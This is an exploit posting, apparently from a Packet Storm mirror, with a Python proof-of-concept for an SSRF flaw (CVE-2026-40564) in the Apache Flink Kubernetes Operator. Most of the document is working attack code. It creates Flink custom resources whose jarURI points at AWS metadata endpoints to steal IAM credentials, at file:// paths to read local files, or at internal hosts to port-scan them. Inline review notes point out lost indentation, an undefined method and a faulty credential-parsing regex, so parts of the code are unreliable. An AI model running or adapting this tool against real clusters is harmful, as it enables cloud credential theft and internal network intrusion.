Share
## https://sploitus.com/exploit?id=PACKETSTORM:223525
==================================================================================================================================
| # Title : Apache Flink Kubernetes Operator 1.14.0 SSRF Exploitation Tool with Metadata Extraction |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 151.0.3 (64 bits) |
| # Vendor : https://flink.apache.org/ |
==================================================================================================================================
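[+] Summary : This is a standalone Python 3 proof-of-concept script (not a Metasploit module) for CVE-2026-40564, a Server-Side Request Forgery (SSRF) vulnerability in the Apache Flink Kubernetes Operator. It talks to the Kubernetes API and submits a Flink custom resource whose jarURI field holds the URL to be fetched.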
[+] POC :
#!/usr/bin/env python3
import argparse
import base64
import json
import sys
import time
import urllib.request
import urllib.parse
import ssl
import re
from typing import Optional, Dict, List, Tuple
# Client for the Kubernetes API that creates, inspects and deletes Flink
# operator custom resources whose jarURI field carries a caller-chosen URL.
# NOTE(review): leading indentation was lost in this copy of the file, so the
# nesting of the statements below has to be inferred from the syntax.
class FlinkOperatorSSRF:
def __init__(self, api_server: str, token: str = None, namespace: str = "default",
verify_ssl: bool = False, timeout: int = 30):
"""Store connection settings and build the request headers and TLS context.

api_server: base URL of the Kubernetes API server; trailing '/' is stripped.
token: optional bearer token; when truthy it is sent as an Authorization header.
namespace: namespace inserted into every namespaced API path built by this class.
verify_ssl: when False, hostname checking and certificate verification are disabled.
timeout: timeout value passed to urlopen for each request.
"""
self.api_server = api_server.rstrip('/')
self.namespace = namespace
self.timeout = timeout
self.verify_ssl = verify_ssl
# Headers shared by every request made through k8s_request.
self.headers = {
'Content-Type': 'application/json'
}
if token:
self.headers['Authorization'] = f'Bearer {token}'
self.ctx = ssl.create_default_context()
if not verify_ssl:
# check_hostname has to be cleared first: the ssl module rejects
# CERT_NONE while hostname checking is still enabled.
self.ctx.check_hostname = False
self.ctx.verify_mode = ssl.CERT_NONE
def log(self, msg: str, level: str = "INFO"):
"""Print msg to stdout behind a coloured tag selected by level.

level: one of the keys of the table below; any other value falls back to
an uncoloured '[*]' tag.
"""
# ANSI escape sequences: colour on, tag text, colour reset.
colors = {
"SUCCESS": "\033[92m[+]\033[0m",
"ERROR": "\033[91m[-]\033[0m",
"WARNING": "\033[93m[!]\033[0m",
"INFO": "\033[96m[*]\033[0m",
"PROC": "\033[94m[@]\033[0m"
}
print(f"{colors.get(level, '[*]')} {msg}")
def k8s_request(self, method: str, path: str, data: dict = None) -> Tuple[Optional[int], Optional[dict]]:
"""Send one HTTP request to the Kubernetes API and decode the reply.

method: HTTP verb handed to urllib.request.Request.
path: API path appended verbatim to self.api_server.
data: optional dict serialised as the JSON request body; a falsy value
(None or an empty dict) sends no body.

Returns (status, parsed_body). parsed_body is the JSON-decoded response,
or None when the response body is empty. An HTTPError yields
(error_code, None); any other exception raised inside the try (this
includes a body that is not valid JSON) is logged and yields (None, None).
"""
url = f"{self.api_server}{path}"
req = urllib.request.Request(url, method=method, headers=self.headers)
if data:
# self.headers already carries this Content-Type; it is set again here.
req.add_header('Content-Type', 'application/json')
req.data = json.dumps(data).encode('utf-8')
try:
with urllib.request.urlopen(req, context=self.ctx, timeout=self.timeout) as resp:
body = resp.read().decode('utf-8')
if body:
return resp.status, json.loads(body)
return resp.status, None
except urllib.error.HTTPError as e:
# 409 is reported to the caller without logging a warning.
if e.code == 409: # Conflict - resource may already exist
return e.code, None
body = e.read().decode('utf-8') if e.fp else ''
# Only the first 200 characters of the error body are logged.
self.log(f"K8s API error: {e.code} - {body[:200]}", "WARNING")
return e.code, None
except Exception as e:
self.log(f"Request failed: {e}", "ERROR")
return None, None
def find_operator_pod(self) -> Optional[str]:
"""Return the name of the first pod that looks like the Flink operator.

Lists the pods of self.namespace and returns the first name containing
'flink-kubernetes-operator' (case-insensitive). Returns None when the
listing fails or no pod name matches.
"""
self.log("Searching for Flink operator pod...", "PROC")
status, pods = self.k8s_request('GET', f'/api/v1/namespaces/{self.namespace}/pods')
if status == 200 and pods:
for pod in pods.get('items', []):
name = pod.get('metadata', {}).get('name', '')
if 'flink-kubernetes-operator' in name.lower():
self.log(f"Found operator pod: {name}", "SUCCESS")
return name
# NOTE(review): presumably at function level, so the warning is also logged
# when the pod listing itself failed - confirm against an indented copy.
self.log("Could not find operator pod", "WARNING")
return None
def get_operator_logs(self, pod_name: str, tail_lines: int = 100) -> Optional[str]:
"""Request the last tail_lines log lines of pod_name in self.namespace.

The body is whatever k8s_request returns (it JSON-decodes any non-empty
body); a non-string result is converted with str(). Returns None unless
the request status is 200.
"""
status, logs = self.k8s_request('GET', f'/api/v1/namespaces/{self.namespace}/pods/{pod_name}/log?tailLines={tail_lines}')
if status == 200:
return logs if isinstance(logs, str) else str(logs)
return None
def create_flink_session_job(self, name: str, jar_uri: str) -> bool:
"""POST a FlinkSessionJob manifest whose spec.job.jarURI is jar_uri.

name: metadata.name of the resource to create in self.namespace.
jar_uri: value placed verbatim in spec.job.jarURI.

Returns True only when the API answers 201; every other status
(including None from a failed request) is logged as an error and
returns False.
"""
manifest = {
"apiVersion": "flink.apache.org/v1beta1",
"kind": "FlinkSessionJob",
"metadata": {
"name": name,
"namespace": self.namespace
},
"spec": {
"job": {
"jarURI": jar_uri,
"parallelism": 1,
"upgradeMode": "stateless"
},
# The remaining spec sections are sent as empty objects.
"flinkConfiguration": {},
"jobManager": {},
"taskManager": {}
}
}
status, _ = self.k8s_request(
'POST',
f'/apis/flink.apache.org/v1beta1/namespaces/{self.namespace}/flinksessionjobs',
manifest
)
if status == 201:
self.log(f"Created FlinkSessionJob: {name}", "SUCCESS")
return True
self.log(f"Failed to create FlinkSessionJob: HTTP {status}", "ERROR")
return False
def delete_resource(self, name: str, resource_type: str = 'flinksessionjob') -> bool:
"""Issue a DELETE for one flink.apache.org/v1beta1 resource in self.namespace.

resource_type: singular resource name; an 's' is appended to form the
plural path segment.

Returns True (and logs) when the status is 200, 202 or 204, otherwise
False without logging anything here.
"""
path = f'/apis/flink.apache.org/v1beta1/namespaces/{self.namespace}/{resource_type}s/{name}'
status, _ = self.k8s_request('DELETE', path)
if status in [200, 202, 204]:
self.log(f"Deleted {resource_type}: {name}", "SUCCESS")
return True
return False
def get_resource_status(self, name: str, resource_type: str = 'flinksessionjob') -> Optional[dict]:
"""GET one flink.apache.org/v1beta1 resource from self.namespace.

Despite the name, the whole decoded object is returned (callers read its
'status' key themselves). Returns None unless the request status is 200.
"""
path = f'/apis/flink.apache.org/v1beta1/namespaces/{self.namespace}/{resource_type}s/{name}'
status, data = self.k8s_request('GET', path)
if status == 200:
return data
return None
def check_ssrf(self, jar_uri: str, use_session_cluster: bool = True) -> bool:
"""Create a resource pointing at jar_uri, inspect the outcome, then delete it.

Steps visible in the code: create the resource, sleep 15 seconds, read the
resource back and search its 'status' for a fixed list of error strings,
look for jar_uri in the operator pod logs, delete the resource.

Returns False when resource creation fails.
NOTE(review): the final 'return True' appears to be unconditional, i.e.
True would mean "resource was created", not "a fetch was observed" -
confirm against an indented copy of the file.
"""
resource_type = 'flinksessionjob' if use_session_cluster else 'flinkdeployment'
# Name is derived from the current time truncated to whole seconds.
resource_name = f"ssrf-{int(time.time())}"
self.log(f"Creating SSRF resource: {resource_name}", "PROC")
self.log(f"Target URL: {jar_uri}")
if use_session_cluster:
success = self.create_flink_session_job(resource_name, jar_uri)
else:
# NOTE(review): create_flink_deployment is not defined anywhere in the
# visible source; as written this branch would raise AttributeError.
success = self.create_flink_deployment(resource_name, jar_uri)
if not success:
return False
self.log("Waiting for operator reconciliation (15s)...", "PROC")
time.sleep(15)
status = self.get_resource_status(resource_name, resource_type)
if status and status.get('status'):
# The status sub-object is flattened to JSON text for substring checks.
status_text = json.dumps(status['status'])
self.log(f"Resource status: {status_text[:200]}...")
error_keywords = [
'Failed to fetch',
'Connection refused',
'connect timed out',
'UnknownHostException',
'FileNotFoundException'
]
# Only the first matching keyword is reported.
for keyword in error_keywords:
if keyword in status_text:
self.log(f"SSRF attempt confirmed: {keyword}", "SUCCESS")
break
# NOTE(review): whether the log inspection below is nested under the status
# check above cannot be determined from this copy.
operator_pod = self.find_operator_pod()
if operator_pod:
self.log("Fetching operator logs...", "PROC")
logs = self.get_operator_logs(operator_pod, 200)
if logs and jar_uri in logs:
self.log(f"SSRF CONFIRMED - operator fetched {jar_uri}", "SUCCESS")
if 'GET' in logs and jar_uri in logs:
self.log("HTTP GET request confirmed in logs", "SUCCESS")
ua_match = re.search(r'User-Agent: ([^\n]+)', logs)
if ua_match:
self.log(f"User-Agent: {ua_match.group(1)}")
self.log("Cleaning up resources...", "PROC")
self.delete_resource(resource_name, resource_type)
return True
def read_aws_metadata(self, use_session_cluster: bool = True) -> Optional[dict]:
"""Submit one resource per hard-coded 169.254.169.254 URL and collect matches.

For each URL: create a resource with that URL as jarURI, sleep 10 seconds,
read the resource back, and keep its JSON-encoded 'status' when that text
contains 'iam' or 'security-credentials' (case-insensitive).

Returns a dict mapping URL -> status text, or None when nothing matched.
The return value of the create call is not checked here.
"""
self.log("Attempting to read AWS metadata via SSRF...", "PROC")
metadata_urls = [
"http://169.254.169.254/latest/meta-data/",
"http://169.254.169.254/latest/meta-data/iam/security-credentials/",
"http://169.254.169.254/latest/user-data/",
"http://169.254.169.254/latest/dynamic/instance-identity/document"
]
results = {}
for url in metadata_urls:
self.log(f"Trying: {url}")
resource_name = f"ssrf-metadata-{int(time.time())}"
resource_type = 'flinksessionjob' if use_session_cluster else 'flinkdeployment'
if use_session_cluster:
self.create_flink_session_job(resource_name, url)
else:
# NOTE(review): create_flink_deployment is not defined anywhere in the
# visible source; as written this branch would raise AttributeError.
self.create_flink_deployment(resource_name, url)
time.sleep(10)
status = self.get_resource_status(resource_name, resource_type)
if status and status.get('status'):
status_text = json.dumps(status['status'])
if 'iam' in status_text.lower() or 'security-credentials' in status_text.lower():
self.log(f"Metadata found at {url}!", "SUCCESS")
# This pattern matches every run of letters, digits, '-' and '_' in the
# status text, so the entries printed as "Role" are arbitrary tokens.
roles = re.findall(r'([a-zA-Z0-9\-_]+)', status_text)
results[url] = status_text
for role in roles:
if len(role) > 3 and not role.isdigit():
self.log(f" Role: {role}")
# NOTE(review): presumably executed once per URL (loop level) - confirm.
self.delete_resource(resource_name, resource_type)
time.sleep(1)
return results if results else None
def read_local_file(self, filepath: str, use_session_cluster: bool = True) -> Optional[str]:
"""Submit a resource with a file:// jarURI and look for text in its status.

filepath: appended verbatim after 'file://'.

After a 10 second sleep the resource is read back. When its JSON-encoded
'status' contains 'file://', the text following 'Message: ' (up to the
next double quote or end of string) is printed and returned. Returns None
when nothing was extracted. The return value of the create call is not
checked here.
"""
self.log(f"Attempting to read file: {filepath}", "PROC")
jar_uri = f"file://{filepath}"
resource_name = f"ssrf-file-{int(time.time())}"
resource_type = 'flinksessionjob' if use_session_cluster else 'flinkdeployment'
if use_session_cluster:
self.create_flink_session_job(resource_name, jar_uri)
else:
# NOTE(review): create_flink_deployment is not defined anywhere in the
# visible source; as written this branch would raise AttributeError.
self.create_flink_deployment(resource_name, jar_uri)
time.sleep(10)
status = self.get_resource_status(resource_name, resource_type)
content = None
if status and status.get('status'):
status_text = json.dumps(status['status'])
if 'file://' in status_text:
file_content = re.search(r'Message: (.+?)(?:\"|$)', status_text)
if file_content:
content = file_content.group(1)
self.log(f"File content extracted:", "SUCCESS")
print("\n" + "=" * 65)
print(content)
print("=" * 65)
# NOTE(review): presumably at function level so the resource is always
# deleted - confirm against an indented copy.
self.delete_resource(resource_name, resource_type)
return content
def internal_port_scan(self, host: str, ports: List[int], use_session_cluster: bool = True) -> List[int]:
"""Submit one resource per port with jarURI http://host:port/ and classify it.

For each port: create the resource, sleep 5 seconds, read it back and
classify the JSON-encoded 'status' text:
'Connection refused' -> logged as closed
'connect timed out' -> logged as timeout
no 'Failed to fetch' text -> logged as open and added to the result
A status containing 'Failed to fetch' without the first two strings is
not logged at all. Ports whose resource has no 'status' are skipped.

Returns the list of ports classified as open, in input order.
"""
self.log(f"Scanning {host} ports: {ports}", "PROC")
open_ports = []
for port in ports:
url = f"http://{host}:{port}/"
self.log(f"Testing port {port}...")
resource_name = f"ssrf-scan-{port}-{int(time.time())}"
resource_type = 'flinksessionjob' if use_session_cluster else 'flinkdeployment'
if use_session_cluster:
self.create_flink_session_job(resource_name, url)
else:
# NOTE(review): create_flink_deployment is not defined anywhere in the
# visible source; as written this branch would raise AttributeError.
self.create_flink_deployment(resource_name, url)
time.sleep(5)
status = self.get_resource_status(resource_name, resource_type)
if status and status.get('status'):
status_text = json.dumps(status['status'])
if 'Connection refused' in status_text:
self.log(f"Port {port}: closed")
elif 'connect timed out' in status_text:
self.log(f"Port {port}: timeout (maybe filtered)")
elif 'Failed to fetch' not in status_text:
self.log(f"Port {port}: OPEN or responding", "SUCCESS")
open_ports.append(port)
# NOTE(review): presumably executed once per port (loop level) - confirm.
self.delete_resource(resource_name, resource_type)
return open_ports
def run(self, ssrf_url: str = None, use_session_cluster: bool = True,
read_metadata: bool = False, read_file: str = None,
scan_host: str = None, scan_ports: List[int] = None) -> bool:
"""Check API connectivity, then run exactly one action chosen by the arguments.

The action is picked by the first truthy option in this order:
read_metadata, read_file, scan_host together with scan_ports, ssrf_url.
With none of them set an error is logged.

Returns False when GET /version does not answer 200. Otherwise the result
reflects the selected action.
NOTE(review): what is returned when the metadata or file action finds
nothing depends on the nesting of the final 'return False', which cannot
be determined from this copy.
"""
self.log(f"Target: {self.api_server}")
self.log(f"Namespace: {self.namespace}")
# Connectivity probe before any resource is created.
status, _ = self.k8s_request('GET', '/version')
if status != 200:
self.log("Cannot connect to Kubernetes API", "ERROR")
return False
self.log("Connected to Kubernetes API", "SUCCESS")
if read_metadata:
metadata = self.read_aws_metadata(use_session_cluster)
if metadata:
self.log("AWS metadata extraction complete", "SUCCESS")
return True
elif read_file:
content = self.read_local_file(read_file, use_session_cluster)
if content:
return True
elif scan_host and scan_ports:
open_ports = self.internal_port_scan(scan_host, scan_ports, use_session_cluster)
if open_ports:
self.log(f"Open ports: {open_ports}", "SUCCESS")
return bool(open_ports)
elif ssrf_url:
return self.check_ssrf(ssrf_url, use_session_cluster)
else:
self.log("No action specified", "ERROR")
return False
def main():
"""Parse the command line, build a FlinkOperatorSSRF and exit with its result.

The process exit code is 0 when run() returns a truthy value and 1 otherwise.
"""
parser = argparse.ArgumentParser(
description="CVE-2026-40564 - Apache Flink Kubernetes Operator SSRF"
)
parser.add_argument("--api-server", required=True, help="Kubernetes API server URL")
parser.add_argument("--token", help="Bearer token for authentication")
parser.add_argument("--namespace", default="default", help="Kubernetes namespace")
parser.add_argument("--insecure", action="store_true", help="Skip SSL verification")
parser.add_argument("--ssrf-url", help="URL to fetch via SSRF")
parser.add_argument("--read-aws-metadata", action="store_true", help="Read AWS instance metadata")
parser.add_argument("--read-file", help="Read local file via file:// scheme")
parser.add_argument("--scan-host", help="Host to scan for open ports")
parser.add_argument("--scan-ports", help="Comma-separated ports to scan (e.g., 80,443,8080)")
parser.add_argument("--use-deployment", action="store_true", help="Use FlinkDeployment instead of FlinkSessionJob")
parser.add_argument("--timeout", type=int, default=30, help="Request timeout")
args = parser.parse_args()
# NOTE(review): the banner's border characters look mis-encoded in this copy
# of the file; the string is left exactly as found.
print("""
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โ CVE-2026-40564 - Apache Flink Kubernetes Operator SSRF โ
โ Server-Side Request Forgery via jarURI โ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
""")
# Certificate verification is on unless --insecure is given.
exploit = FlinkOperatorSSRF(
api_server=args.api_server,
token=args.token,
namespace=args.namespace,
verify_ssl=not args.insecure,
timeout=args.timeout
)
scan_ports = None
if args.scan_ports:
# int() raises ValueError on a non-numeric or empty entry; it is not caught here.
scan_ports = [int(p.strip()) for p in args.scan_ports.split(',')]
success = exploit.run(
ssrf_url=args.ssrf_url,
use_session_cluster=not args.use_deployment,
read_metadata=args.read_aws_metadata,
read_file=args.read_file,
scan_host=args.scan_host,
scan_ports=scan_ports
)
sys.exit(0 if success else 1)
# Run the command-line entry point only when executed as a script, not on import.
if __name__ == "__main__":
main()
Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================